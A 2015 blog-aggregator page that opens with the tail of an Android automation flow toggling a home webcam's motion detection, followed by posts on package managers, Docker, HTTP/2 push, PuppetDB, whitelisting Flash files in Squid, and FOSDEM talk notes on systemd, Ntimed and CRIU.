    <useDefaultName>true</useDefaultName>
    <name>WiFi Disconnected: SSID</name>
    <enabled>true</enabled>
    <all>false</all>
    <ssidList>SSID</ssidList>
  </trigger>
  <condition type="active_network_type">
    <useDefaultName>true</useDefaultName>
    <name>Active Network Type: Mobile</name>
    <none>false</none>
    <mobile>true</mobile>
    <wifi>false</wifi>
    <wimax>false</wimax>
    <bluetooth>false</bluetooth>
    <ethernet>false</ethernet>
  </condition>
  <action type="http_request">
    <useDefaultName>true</useDefaultName>
    <name>HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save store in motion</name>
    <url>https://webcam.public.url/setSystemMotion</url>
    <verifyCertificates>true</verifyCertificates>
    <basicAuthentication>true</basicAuthentication>
    <username>admin</username>
    <httpMethod>POST</httpMethod>
    <httpContentType>X_WWW_FORM_URLENCODED</httpContentType>
    <contentType>text/plain</contentType>
    <generalTextData></generalTextData>
    <formFieldList>ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save</formFieldList>
    <timeout>60000</timeout>
    <storeInVariable>true</storeInVariable>
    <variable>motion</variable>
    <path>/storage/emulated/0/Download/file.bin</path>
  </action>
  <action type="http_request">
    <useDefaultName>true</useDefaultName>
    <name>HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save store in response</name>
    <url>https://webcam.public.url/setSystemMotion</url>
    <verifyCertificates>true</verifyCertificates>
    <basicAuthentication>true</basicAuthentication>
    <username>admin</username>
    <httpMethod>POST</httpMethod>
    <httpContentType>X_WWW_FORM_URLENCODED</httpContentType>
    <contentType>text/plain</contentType>
    <generalTextData></generalTextData>
    <formFieldList>ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save</formFieldList>
    <timeout>60000</timeout>
    <storeInVariable>true</storeInVariable>
    <variable>response</variable>
    <path>/storage/emulated/0/Download/file.bin</path>
  </action>
  <action type="notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Notification on Statusbar: Webcam disabled House ID 2</name>
    <notificationIcon>HOUSE</notificationIcon>
    <title>Webcam disabled</title>
    <message>Motion disabled</message>
    <sound>false</sound>
    <vibrate>false</vibrate>
    <flashLED>false</flashLED>
    <flashLEDColor>#ff00ff00</flashLEDColor>
    <flashLEDOn>500</flashLEDOn>
    <flashLEDOff>500</flashLEDOff>
    <flagLocalOnly>false</flagLocalOnly>
    <flagOngoing>false</flagOngoing>
    <flagNoClear>false</flagNoClear>
    <notificationIDEnabled>true</notificationIDEnabled>
    <notificationID>2</notificationID>
    <priority>DEFAULT</priority>
    <visibility>PRIVATE</visibility>
    <messageBigEnabled>false</messageBigEnabled>
    <messageBig></messageBig>
    <largeIconEnabled>false</largeIconEnabled>
    <largeIcon></largeIcon>
  </action>
  <action type="notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Notification on Statusbar: Webcam enabled House ID 3</name>
    <notificationIcon>HOUSE</notificationIcon>
    <title>Webcam enabled</title>
    <message>Motion enabled</message>
    <sound>false</sound>
    <vibrate>false</vibrate>
    <flashLED>false</flashLED>
    <flashLEDColor>#ff00ff00</flashLEDColor>
    <flashLEDOn>500</flashLEDOn>
    <flashLEDOff>500</flashLEDOff>
    <flagLocalOnly>false</flagLocalOnly>
    <flagOngoing>false</flagOngoing>
    <flagNoClear>false</flagNoClear>
    <notificationIDEnabled>true</notificationIDEnabled>
    <notificationID>3</notificationID>
    <priority>DEFAULT</priority>
    <visibility>PRIVATE</visibility>
    <messageBigEnabled>false</messageBigEnabled>
    <messageBig></messageBig>
    <largeIconEnabled>false</largeIconEnabled>
    <largeIcon></largeIcon>
  </action>
  <action type="remove_notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Remove Notification on Statusbar: 2 (Automagic)</name>
    <automagicNotifications>true</automagicNotifications>
    <all>false</all>
    <notificationID>2</notificationID>
    <overall>true</overall>
    <packageName></packageName>
    <allOfApp>true</allOfApp>
    <filterNotificationID></filterNotificationID>
  </action>
  <action type="remove_notification_status_bar">
    <useDefaultName>true</useDefaultName>
    <name>Remove Notification on Statusbar: 3 (Automagic)</name>
    <automagicNotifications>true</automagicNotifications>
    <all>false</all>
    <notificationID>3</notificationID>
    <overall>true</overall>
    <packageName></packageName>
    <allOfApp>true</allOfApp>
    <filterNotificationID></filterNotificationID>
  </action>
  <action type="sleep">
    <useDefaultName>true</useDefaultName>
    <name>Sleep: 15s (allow device sleep)</name>
    <duration>15s</duration>
    <keepDeviceAwake>false</keepDeviceAwake>
  </action>
  <flow type="flow">
    <name>Webcam disable motion</name>
    <group>Webcam</group>
    <enabled>true</enabled>
    <lastExecutionStartTime>1417460412281</lastExecutionStartTime>
    <lastExecutionEndTime>1417460413698</lastExecutionEndTime>
    <executionPolicy>PARALLEL</executionPolicy>
    <triggercontainer id="t1" x="-70.0" y="87.5">
      <trigger>WiFi Connected: SSID</trigger>
    </triggercontainer>
    <actioncontainer id="t2" x="-70.0" y="262.5">HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=0,MotionDetectionScheduleDay=30,ConfigSystemMotion=Save store in motion</actioncontainer>
    <actioncontainer id="t3" x="280.0" y="787.5">Remove Notification on Statusbar: 3 (Automagic)</actioncontainer>
    <actioncontainer id="t4" x="35.0" y="577.5">Notification on Statusbar: Webcam disabled House ID 2</actioncontainer>
    <connection from="t1" to="t2" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t2" to="t4" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t4" to="t3" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
  </flow>
  <flow type="flow">
    <name>Webcam enable motion</name>
    <group>Webcam</group>
    <enabled>true</enabled>
    <lastExecutionStartTime>1417459379523</lastExecutionStartTime>
    <lastExecutionEndTime>1417459399056</lastExecutionEndTime>
    <executionPolicy>PARALLEL</executionPolicy>
    <triggercontainer id="t1" x="-175.0" y="17.5">
      <trigger>WiFi Disconnected: SSID</trigger>
    </triggercontainer>
    <actioncontainer id="t2" x="-175.0" y="227.5">Sleep: 15s (allow device sleep)</actioncontainer>
    <conditioncontainer id="t3" x="-175.0" y="472.5">Active Network Type: Mobile</conditioncontainer>
    <actioncontainer id="t4" x="-175.0" y="682.5">HTTP Request: POST https://webcam.public.url/setSystemMotion application/x-www-form-urlencoded ReplySuccessPage=motion.htm,ReplyErrorPage=motion.htm,MotionDetectionEnable=1,MotionDetectionScheduleDay=30,MotionDetectionScheduleMode=0,MotionDetectionSensitivity=50,ConfigSystemMotion=Save store in response</actioncontainer>
    <actioncontainer id="t5" x="105.0" y="262.5">Notification on Statusbar: Webcam enabled House ID 3</actioncontainer>
    <actioncontainer id="t6" x="105.0" y="682.5">Remove Notification on Statusbar: 2 (Automagic)</actioncontainer>
    <connection from="t1" to="t2" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t2" to="t3" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t3" to="t4" type="TRUE" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t3" to="t2" type="FALSE" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t4" to="t5" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
    <connection from="t5" to="t6" type="NORMAL" sourcePosition="SOUTH" targetPosition="NORTH" />
  </flow>
</data>

February 16, 2015 05:00 AM

February 14, 2015

Mattias Geniar

Three Tiers of Package Managers

The post Three Tiers of Package Managers appeared first on ma.ttias.be.

There are too many effing package managers. No, seriously -- there are. If you look at a typical Linux server with a modern webstack installed on it, there are easily five or more package managers available.

Who's responsible for which one? The way I see it, there are 3 typical tiers of package managers, with one problematic zone that we need to address.

The Ops Tier

Every sysadmin knows how to keep their system up-to-date. The Fedora family has the yum package manager, Debian derivatives have apt, Arch has pacman, ... every Linux family has its own major package manager. And every sysadmin knows about these, and how they're used to keep the system updated.

On Linux, the number of package managers we as "ops" need to know about is pretty limited and straightforward.

The Dev Tier

Enter the wild west. Most programming languages have one or more package managers.

In the PHP world, one of the older -- but still used -- package managers is pear. Pear is used to install common PHP classes server-wide.

In addition, in recent years PHP has seen the adoption of the composer package manager. This is far more flexible than pear, as it allows packages (typically PHP classes and the occasional system binary) to be installed locally, in a local path. composer also allows packages to be installed system-wide (e.g. drush), but most use is for local classes, specific to the project.

Composer uses upstream repositories (like cvs, git, tarballs, ...) to install packages, but a developer can also use plain git submodules for dependency management.
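To make that local-versus-global distinction concrete, a hypothetical composer session (the package names are only examples):

# Local: ends up in ./vendor/ of the current project
composer require guzzlehttp/guzzle
# Global: ends up in ~/.composer, handy for CLI tools like drush
composer global require drush/drush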

The Node community has npm, Puppet-folks have librarian, Ruby has bundler, ...

These tools are more obvious: they are the responsibility of the developer. If urgent updates are needed, the developer should check for compatibility and install/update the required package.

The Middle Ground (DevOps?)

Between the Ops and Dev package managers lies a more difficult grey area. It's the area that requires more communication between Dev + Ops and a lot more coordination.

For instance, the PHP world also has a package manager called pecl. Pecl is a package manager that downloads PHP extension source code and compiles it into a working PHP extension. The pecl package manager is often run with root privileges; the PHP extension is installed server-wide and enabled in the /etc/php.d/ .ini configurations.
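A typical flow looks something like this (the extension name is just an illustration):

# Downloads and compiles the extension, server-wide, as root:
pecl install redis
# Enable it for every PHP process on the box:
echo 'extension=redis.so' > /etc/php.d/redis.ini
service php-fpm restart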

But these kinds of installations are mostly one-time events. Since pecl is one of those typical lesser-used/third-party package managers, extensions are often installed once and never updated.

The same goes for the Ruby world, with packages installed via gem or in Python's case via pip. Add to this the ability to run multiple versions of Ruby with rvm, each having their own gems, and it can quickly become a problem of responsibilities.

Whose task is it to keep the additional system-wide packages up-to-date? Updating a pecl/gem/pip package can have a serious impact on the application.

Typically, those kinds of packages are only updated when A) a developer reports a problem or B) a security vulnerability is reported and the update is required, regardless of application compatibility (which can be fixed in a later stage).

Clear separation of concerns

That grey area is problematic. Ops know their package managers, Dev know theirs. But those packages that have a direct impact on the application *and* require root-level privileges to install/update will come back to haunt us one day.

Ruby's method of locally installing gems via rvm is a solid approach, but how often are those gems updated by developers? For PHP I think it's even more complex, as custom extensions need to be loaded in the php-fpm master process, typically started/stopped/managed by system administrators -- not developers. There's no easy way to inject custom PHP extensions as a developer, without Ops intervention.

If anyone is looking for a new open source idea, I think package/repository management is an area that can use a lot of loving and has a lot of potential. The most difficult part is having all communities (Linux distributions + developer communities) to come together on this.

The post Three Tiers of Package Managers appeared first on ma.ttias.be.

by Mattias Geniar at February 14, 2015 10:12 AM

Wouter Verhelst

Docker

... is the new hype these days. Everyone seems to want to be part of it; even Microsoft wants to allow Docker to run on its platform. How they visualise that is slightly beyond me, seeing as Docker is mostly a case of "run a bunch of LXC instances", which by their definition can't happen on Windows. Presumably they'll just run a lot more VMs, then, which is a possible workaround. Or maybe Docker for Windows will be the same in concept, but not in implementation. I guess the future will tell.

As I understand the premise, the idea of Docker is that getting software to run on "all" distributions is a Hard Problem[TM], so in a Docker thing you just define that this particular stuff is meant to run on top of this and this and that environment, and Docker then compartmentalises everything for you. It should make things easier to maintain, and that's a good thing.

I'm not a fan. If the problem that Docker tries to fix is "making software run on all platforms is hard", then Docker's "solution" is "I give up, it's not possible". That's sad. Sure, having a platform which manages your virtualisation for you, without having to manually create virtual machines (or having to write software to do so) is great. And sure, compartmentalising software so that every application runs in its own space can help towards security, manageability, and a whole bunch of other advantages.

But having an environment which says "if you want to run this application, I'll set up a chroot with distribution X for you; if you want to run this other application, I'll set up a chroot with distribution Y for you; and if you want to run yet this other application here, I'll set up a chroot with distribution Z for you" will, in the end, get you a situation where, if there's another bug in libc6 or libssl, you now have a nightmare trying to track down all the different versions in all the docker instances to make sure they're all fixed. And while it may work perfectly well on the open Internet, if you're on a corporate network with a paranoid firewall and proxy, downloading packages from public mirrors is harder than just creating a local mirror instead. Which you now have to do not only for your local distribution of choice, but also for the distributions of choice of all the developers of the software you're trying to use. Which may result in more work than just trying to massage the software in question to actually bloody well work, dammit.

I'm sure Docker has a solution for some or all of the problems it introduces, and I'm not saying it doesn't work in practice. I'm sure it does fix some part of the "making software run on all platforms is hard" problem, and so I might even end up using it at some point. But from an aesthetic point of view, I don't think Docker is a good system.

I'm not very fond of giving up.

February 14, 2015 09:58 AM

February 11, 2015

Frank Goossens

Motivational bull rebuffed

Just found this gem on the interwebz:

When “I” is replaced by “we”, even “illness” becomes “wellness”.

I’m not that into group-motivational bull, so I had to restrain myself from replying:

And I’ll puke becomes we’ll puke. But somehow that’s less motivational, isn’t it? ;-)

by frank at February 11, 2015 08:18 AM

February 10, 2015

Philip Van Hoof

Huge respect for German chancellor Merkel

I, myself, actually would not be able to live with not having made this attempt – Angela Merkel

by admin at February 10, 2015 11:25 PM

February 09, 2015

Mattias Geniar

Service Side Push in HTTP/2 With nghttp2

The post Service Side Push in HTTP/2 With nghttp2 appeared first on ma.ttias.be.

At this pace of development, nghttp2 is a project to keep an eye on.

We implemented HTTP/2 server push in nghttpx and we enabled server push in nghttp2.org site. When you access https://nghttp2.org via HTTP/2 protocol, CSS file /stylesheets/screen.css is pushed to client.
nghttp2 blog

If you look at the page load of that blog in the browser, a few things stand out.

nghttp2_server_side_push

The response header contained a link: header for sending additional content to the browser without the client having to request it (and thus without needing to parse the DOM first). This finally shows HTTP/2 server side push in the real world.

(note: to view the HTTP/2 protocol in the network tab, you should run Chrome Canary for the moment)
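You can also watch the push happen from the command line with the nghttp client that ships with nghttp2 (a sketch; -n discards the downloaded data, -v prints the frames, and a pushed resource shows up as a PUSH_PROMISE frame):

nghttp -nv https://nghttp2.org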

The result of this action is that the download of the stylesheet can happen much quicker. This is best shown with a comparison of a plain HTTP/1.1 site vs. the new HTTP/2 method with server side push.

Traditional HTTP/1.1 page load

For instance, here's the waterfall view of my own blog, running the classic HTTP/1.1 protocol.

plain_http_1_1_requests

The GET / request is made, and then stalls for a few milliseconds (~20ms) parsing the page before requesting the next resource, widget.css.

HTTP/2 Server Side Push page load

Compared to the HTTP/2 flow.

nghttp_server_side_push_benefit

The DOM doesn't need to be parsed first: the client can already begin downloading the screen.css resource, without "wasting time" processing the DOM and its external references only to make a new request to the server to fetch them.

Add this up for all resources on a page and you can easily save 100-200ms off the total page load/paint of a website. Those are numbers that should really make you consider implementing HTTP/2.

In terms of responsiveness and web speed, HTTP/2 can make a serious difference -- especially with server side push.

The post Service Side Push in HTTP/2 With nghttp2 appeared first on ma.ttias.be.

by Mattias Geniar at February 09, 2015 09:53 PM

Kris Buytaert

2014 vs 2015 interest in Open Source Configuration Management

A couple of people asked me for the results of the survey of 2015 vs 2014 Configuration Management Camp room interests.

These are the responses of 350 people last year and 420 this year, telling us which tools they are interested in so we can map the right room sizes to the communities.

2014 :

2015:

Enjoy... but remember, there are Lies, Damn Lies and Statistics.
PS: this is a mostly European audience.

by Kris Buytaert at February 09, 2015 08:05 PM

Frank Goossens

Alt-J on Arte with La Blogotheque

If you hurry (the vid is up until tomorrow evening, February 10th), you can watch Alt-J perform live in “La chapelle des Petits Augustins des Beaux Arts” thanks to Arte & La Blogotheque.

by frank at February 09, 2015 05:53 PM

February 06, 2015

Dries Buytaert

Growing Drupal in Latin America

When I visited Brazil in 2011, I was so impressed by the Latin American Drupal community and how active and passionate the people are. The region is fun and beautiful, with some of the most amazing sites I have seen anywhere in the world. It also happens to be a strategic region for the project.

Latin American community members are doing their part to grow the project and the Drupal community. In 2014, the region hosted 19 Global Training Day events to recruit newcomers, and community leaders coordinated many Drupal camps to help convert those new Drupal users into skilled talent. Members of the Latin American community help promote Drupal at local technology and Open Source events, visiting events like FISL (7,000+ participants), Consegi (5,000+ participants) and Latinoware (4,500+ participants).

You can see the results of all the hard work in the growth of the Latin American Drupal business ecosystem. The region has a huge number of talented developers working at agencies large and small. When they aren't creating great Drupal websites like the one for the Rio 2016 Olympics, they are contributing code back to the project. For example, during our recent Global Sprint Weekend, communities in Bolivia, Colombia, Costa Rica, and Nicaragua participated and made valuable contributions.

The community has also been instrumental in translation efforts. On localize.drupal.org, the top translation is Spanish with 500 contributors, and a significant portion of those contributors come from the Latin America region. Community members are also investing time and energy translating Drupal educational videos, conducting camps in Spanish, and even publishing a Drupal magazine in Spanish. All of these efforts lower the barrier to entry for Spanish speakers, which is incredibly important because Spanish is one of the top spoken languages in the world. While the official language of the Drupal project is English, there can be a language divide for newcomers who primarily speak other languages.

Last but not least, I am excited that we are bringing DrupalCon to Latin America next week. This is the fruit of many hours spent by passionate volunteers in the Latin American local communities, working together with the Drupal Association to figure out how to make a DrupalCon happen in this part of the world. At every DrupalCon we have had so far, we have seen an increase in energy for the project and a bump in engagement. Come for the software, stay for the community! Hasta pronto!

by Dries at February 06, 2015 07:45 PM

Mattias Geniar

Clearing All Data From PuppetDB (exported resources)

The post Clearing All Data From PuppetDB (exported resources) appeared first on ma.ttias.be.

I had an annoying problem in my test environment when working with Puppet's exported resources, which was caused by a unique constraint violation.

$ puppet agent -t
...
Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Failed to submit 'replace facts' command for $::fqdn to PuppetDB at $::puppetmaster:8081: [404 Not Found]
Problem accessing /v3/commands. Reason: Not Found
...
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run

On the PuppetDB logs, I could see signs of integrity violations in the database.

...
org.hsqldb.HsqlException: error in script file line: 9621 org.hsqldb.HsqlException: integrity constraint violation: unique constraint or index violation; SYS_PK_10029 table: RESOURCE_PARAMS
...

Since this was a test environment and I didn't really feel like debugging this all too much, I considered it easier to just remove all data from the PuppetDB built-in storage and start anew, thinking it was most likely caused by a user-error on my side.

To clear all data from your PuppetDB, take the following steps. It'll stop PuppetDB, remove the data-directory and restart PuppetDB so it can rebuild its data structures.

$ service puppetdb stop
$ cd /var/lib/puppetdb 
$ mv db db.old
$ service puppetdb start

After the new start, your PuppetDB logs will contain the following kind of entries.

INFO  [c.p.p.s.migrate] Applying database migration version 1
INFO  [c.p.p.s.migrate] Applying database migration version 2
INFO  [c.p.p.s.migrate] Applying database migration version 3
...
INFO  [c.p.p.c.services] Starting broker

In the end, your directory structures will be similar to these.

$ ls -alh /var/lib/puppetdb/
drwxr-xr-x   6 puppetdb puppetdb 4.0K Jan 29 09:01 .
drwxr-xr-x. 30 root     root     4.0K Jul  2  2014 ..
lrwxrwxrwx   1 puppetdb puppetdb   20 Jan 14 13:05 config -> /etc/puppetdb/conf.d
drwxr-xr-x   3 puppetdb puppetdb 4.0K Jan 29 09:03 db
drwxr-xr-x   3 puppetdb puppetdb 4.0K Jan 29 09:01 db.old
drwxr-xr-x   3 puppetdb puppetdb 4.0K Oct 21 20:38 mq
drwxr-xr-x   2 puppetdb puppetdb 4.0K Oct 21 20:38 state

The db.old can be removed if you no longer need it, or placed back into place to debug whichever problem you had in the first place.

The post Clearing All Data From PuppetDB (exported resources) appeared first on ma.ttias.be.

by Mattias Geniar at February 06, 2015 08:17 AM

Frank Goossens

What does a webtech addict do when in a Tesla?

Well, checking out the browser, of course!

I had the opportunity to ride along with a friend in his brand new Tesla yesterday. Great ride, but you knew that already, so obviously I checked out the browser and the data connectivity. I visited my own little “ip check” page and saw this in the logfile:

188.207.103.140 – – [05/Feb/2015:12:17:24 +0100] “GET /check_ip.php HTTP/1.1″ 200 132 “-” “Mozilla/5.0 (X11; Linux) AppleWebKit/534.34 (KHTML, like Gecko) QtCarBrowser Safari/534.34″

Breaking it down:

  • X11; Linux: the infotainment system runs Linux with an X11 display.
  • AppleWebKit/534.34: the WebKit build that shipped with Qt 4.8’s QtWebKit.
  • QtCarBrowser: Tesla’s own Qt-based browser.

I sure hope there are not too many vulnerabilities in those old versions of Qt and WebKit, but one does not drive a Tesla to browse the internet, does one? ;-)

by frank at February 06, 2015 06:14 AM

February 05, 2015

Mattias Geniar

FCC: Net Neutrality in the United States

The post FCC: Net Neutrality in the United States appeared first on ma.ttias.be.

Now we (well, the US) is getting somewhere.

The internet must be fast, fair and open. That is the message I’ve heard from consumers and innovators across this nation. That is the principle that has enabled the internet to become an unprecedented platform for innovation and human expression.
Tom Wheeler, FCC chairman

Couldn't agree more.

I've ranted on net neutrality often enough already, so I won't repeat myself. I'm very happy to see the FCC take regulatory actions to ensure net neutrality on a higher level.

Using this authority, I am submitting to my colleagues the strongest open internet protections ever proposed by the FCC. These enforceable, bright-line rules will ban paid prioritization, and the blocking and throttling of lawful content and services. I propose to fully apply—for the first time ever—those bright-line rules to mobile broadband. My proposal assures the rights of internet users to go where they want, when they want, and the rights of innovators to introduce new products without asking anyone’s permission.

Tom Wheeler, FCC chairman

I'm curious to see Europe's response, if any.

The post FCC: Net Neutrality in the United States appeared first on ma.ttias.be.

by Mattias Geniar at February 05, 2015 02:33 PM

Check if Value is Present in Array in Puppet

The post Check if Value is Present in Array in Puppet appeared first on ma.ttias.be.

I somehow keep having to google this, and the first hits are bug reports or old posts (pre 2010) that require inlined Ruby code for Puppet 2.7. There's an easier way to check this.

To see if a variable value is present in an array, use the following.

if ! ($ensure in [ 'present', 'absent' ]) {
   ...
}

The above condition is true when the value of the variable $ensure is neither 'present' nor 'absent'.

The post Check if Value is Present in Array in Puppet appeared first on ma.ttias.be.

by Mattias Geniar at February 05, 2015 01:46 PM

February 04, 2015

Xavier Mertens

Restricting Access to Flash Files with Squid

Is “swf” the new “wtf“? What’s happening with the Flash player? Adobe’s multimedia platform has been targeted by multiple 0-days since the beginning of 2015! Just have a look at cvedetails.com. Two days ago, security researchers at TrendMicro found another one, identified as CVE-2015-0313.

Tired of the stream of patches released by Adobe and the impact of deploying them, many security people are brainstorming about removing the popular browser plugin from their computers (and their users’ computers). Is it a good idea? While more and more websites offer alternative HTML5 interfaces (like YouTube), there are still a lot of websites which won’t work without Flash support. In my case, a good example is Deezer, which uses .swf files for its players!

To protect ourselves, why not build a whitelist of trusted Flash files? Here is a quick setup with Squid, the open source proxy. Amongst its many powerful features, Squid offers a flexible ACL (“Access Control List“) system. Basic ACLs can be used to filter domain names, IP addresses or ports, but there are more interesting ACL types like urlpath_regex, which matches a regular expression against the URL path. Regular expressions can be given inline or loaded from flat files (1 element / line). Let’s define two new ACLs:

acl FlashBlacklist urlpath_regex -i \.swf
acl FlashWhitelist urlpath_regex "/etc/squid3/allowed-swf.txt"

The first one matches the string “.swf” (case-insensitively) in the URL path, and the second one matches any regex from the file “/etc/squid3/allowed-swf.txt“. The file looks like this:

/embedded/small-widget-v2.swf
/swf/coreplayer3-v00341125.swf 
/swf/singlePlayer-v10.swf

This example matches the Flash files used by the Deezer player. The next step is to apply the ACLs:

http_access allow FlashWhitelist
http_access deny FlashBlacklist

Take care to insert them at the right place within your existing http_access rules! Here is the result in the Squid log file:

# grep swf /var/log/squid3/access.log
1423084706.664 0 192.168.254.200 TCP_DENIED/403 3889 GET http://taggalaxy.de/taggalaxy_beta.swf - NONE/- text/html
1423084748.191 0 192.168.254.200 TCP_DENIED/403 3969 GET http://s0.2mdn.net/3070333/beco111_Day_Trip_Promo_Fr_300x250.swf - NONE/- text/html
1423084775.988 8 192.168.254.200 TCP_HIT/200 58684 GET http://cdn-files.deezer.com/swf/coreplayer3-v00341125.swf - NONE/- application/x-shockwave-flash

Note that Squid can also block traffic based on the MIME type of objects but the detected type is not always correct (see the 2nd line). Now, it’s up to you to catch the denied access with your preferred log management tool.
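If you want to experiment with MIME-based blocking anyway, here is a rough sketch (the rep_mime_type ACL matches the Content-Type of the server’s reply; keep the whitelist exception first, or your trusted files get blocked too):

cat >> /etc/squid3/squid.conf <<'EOF'
acl FlashMime rep_mime_type -i application/x-shockwave-flash
http_reply_access allow FlashWhitelist
http_reply_access deny FlashMime
EOF
squid3 -k reconfigure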

Working with whitelists is not the most convenient way to allow access to trusted files, but it is the most secure: by default, any .swf file will be blocked. One last remark: this is just a quick countermeasure; it must not stop you from patching your systems!

by Xavier at February 04, 2015 10:00 PM

Mattias Geniar

Game of Chromes

I saw this a few days ago on Twitter, but never paid much attention to it. Until my internet went down, and it popped up. In my browser.

If you're offline and open Chrome, it's a 2D platform game!

[Screenshot: the Chrome offline game]

Not that this has any value inside of a browser, but still --- it's pretty cool!

by Mattias Geniar at February 04, 2015 07:18 PM

February 02, 2015

Mattias Geniar

Deep Insights: The Kernel Boot Process

You've got to love collaboration. Especially on documentation. The GitHub repo 0xAX/linux-insides has a fantastic set of resources that describe the Linux boot process in great detail.

The entire collaborative project is available on GitHub.

It features:

  1. Step 1: From the bootloader to the kernel
  2. Step 2: First steps in the kernel setup
  3. Step 3: Video mode initialization and transition to protected mode

I suggest you take your time for these, as they're quite lengthy and go into great detail.

This project reminded me of another successful collaboration: What happens when you type google.com into your browser's address box and press enter?. That project goes into great depth on all the technical details of web browsing over HTTP/1.1 and the web in general.

by Mattias Geniar at February 02, 2015 09:41 PM

Fosdem 2015 Notes

Last weekend was Fosdem 2015. For some of the talks I attended, I took some detailed notes. Here are links to each of those.

I hope the notes can be of value to someone!

by Mattias Geniar at February 02, 2015 09:22 PM

Claudio Ramirez

Perl@Fosdem: thanks!

So far, the reactions to the Perl presence at Fosdem have been great. The dev-room was more than packed most of the day, the Perl booth was by far the nicest there (biggest Perl library in the world, huge and small camels, wall-sized banners, books, stickers, wine from the city of Perl (!), …) and Larry’s big announcement in a packed 1,400-seat auditorium made waves: Christmas got a date.

So a big thank you to everyone helping out: the speakers, the dev-room (Theo, Geoff!) and booth volunteers and of course the audience!

According to the Fosdem people, the videos should be online Real Soon ™…



by claudio at February 02, 2015 02:54 PM

February 01, 2015

Mattias Geniar

Ntimed: an NTPD replacement

Poul-Henning Kamp presented this talk at FOSDEM, titled "Ntimed: an NTPD replacement".

There was no intro for the talk. None whatsoever. Just the title. And as expected, a completely full room. The man is famous.

Here are some of my notes.

[Slide photos from the talk]

As usual with PHK, one of the main focuses is security.

[More slide photos from the talk]

Despite my rants on this topic, Ntimed looks promising. It's not done yet, but it's something to keep an eye on, before the ticking time bomb of NTPD bites us all.

by Mattias Geniar at February 01, 2015 03:18 PM

What’s New in systemd, 2015 Edition

This post is part of a series of notes I've taken at FOSDEM 2015 in Brussels, Belgium. If you're interested, have a look at the other posts.

A packed room at Fosdem for Lennart Poettering's talk on systemd, the 2015 edition.

systemd is now a core component of most major distributions. In this talk I want to give an overview over everything new in the systemd project over the last year, and what to expect over the next year.

fosdem talk description

There were no slides. None whatsoever. No presentation. He just talked.

[Photo: Lennart Poettering at FOSDEM 2015]

Notes are scribbled down really quickly, so errors may occur. Don't quote this directly. If you spot any errors, please let me know. ;-)

Transcript

[Photo: the packed room at FOSDEM 2015]

Part deux

Updated for correctness:

State retention

systemd will add support for restarting services without losing state. A daemon will be able to store minimal state on disk, so when it's restarted it can resume from that state. This will allow daemons to restart themselves without harm. Lately, journald has received support for this as well.

This concept builds further upon socket activation. When a service is restarted, it can push its open sockets/file descriptors to the systemd daemon, which passes them back to the service once it has restarted. This way, no sockets/fds are lost.
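
For the curious, this maps onto the sd-daemon C API. A minimal sketch, assuming libsystemd's sd_pid_notify_with_fds() and sd_listen_fds() calls and a unit file with FileDescriptorStoreMax= set; error handling is omitted:

/* Sketch of the fd store: assumes libsystemd (link with -lsystemd)
 * and FileDescriptorStoreMax= in the unit file. Illustrative only. */
#include <systemd/sd-daemon.h>
#include <stdio.h>

void store_fd(int sockfd) {
    /* Hand the open socket to systemd; it survives a service restart. */
    sd_pid_notify_with_fds(0, 0, "FDSTORE=1", &sockfd, 1);
}

int main(void) {
    /* On (re)start, reclaim any fds systemd kept for us. */
    int n = sd_listen_fds(0);
    if (n > 0)
        printf("resumed %d stored fd(s), starting at fd %d\n", n, SD_LISTEN_FDS_START);
    return 0;
}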

Key takeaways: most of what is in systemd is optional (except for journald). If there are parts you don't like or disagree with, you can simply not use them. Documentation is being worked on and is considered a priority in the systemd project.

If you're interested, I have another post on resources for learning systemd you may find interesting. It also has some interesting comments.

Update 3/2/2015: I've removed some truly offending comments. I do not approve of hate and threats on this blog. You are free to discuss the pros/cons of systemd -- but any form of threat against anyone's life will be deleted straight away, no matter if it's meant as a "joke".

by Mattias Geniar at February 01, 2015 12:04 PM

Live Migrations for Containers with CRIU

At Fosdem there was a talk about live migrations for containers, using CRIU (Checkpoint/Restore in User-Space).

CRIU comes from the OpenVZ container space, which is backed by Parallels (makers of Virtuozzo, Plesk, ...).

Checkpoint/Restore In Userspace, or CRIU (pronounced kree-oo, IPA: /krɪʊ/, Russian: криу), is a software tool for Linux operating system. Using this tool, you can freeze a running application (or part of it) and checkpoint it to a hard drive as a collection of files. You can then use the files to restore and run the application from the point it was frozen at. The distinctive feature of the CRIU project is that it is mainly implemented in user space.
CRIU

If you're interested in migrating containers "live" (well, sort-of live, with a small hiccup during the freeze), keep an eye on this project.

CRIU is already used in the latest version of OpenVZ.

How it works seems dangerous or magical (whichever term you prefer): CRIU injects code into the running container to obtain a dump of its state. The Wiki has an example of how CRIU works with a simple bash loop inside a container.
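
On the command line it boils down to a dump/restore pair. A sketch with illustrative PID and paths (check criu(8) for the exact flags supported by your version):

# Freeze a process tree and write its state to disk
mkdir -p /tmp/checkpoint
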